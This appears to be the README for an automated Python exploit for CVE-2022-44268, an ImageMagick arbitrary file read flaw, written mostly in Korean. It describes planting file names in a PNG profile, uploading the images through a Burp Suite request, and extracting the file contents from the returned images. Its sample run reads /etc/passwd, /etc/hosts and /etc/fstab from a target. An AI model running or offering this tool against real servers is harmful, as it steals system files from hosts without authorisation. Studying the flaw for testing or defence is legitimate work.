
CVE-2022-44268(ImageMagick 임의 파일 읽기)에 대한 자동화된 Python 익스플로잇. 조작된 PNG를 업로드하고, 반환된 이미지에서 파일 내용을 추출하여 결과를 로컬에 저장합니다.
cve-2022-44268을 사용하여 입력 파일의 입력 파일리스트에 있는 파일 이름으로 프로필 값을 추가하고, 각 수정된 이미지를 업로드하는 파일 업로드에 대해 Burpsuite의 입력 request.req 파일(이미 포함됨)을 사용하여 이미지 파일 업로드를 업데이트하며, 반환된 URL에서 이미지를 다운로드하고 파일 내용을 추출하여 입력 디렉토리에 배치하는 자동 Python 스크립트입니다.
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab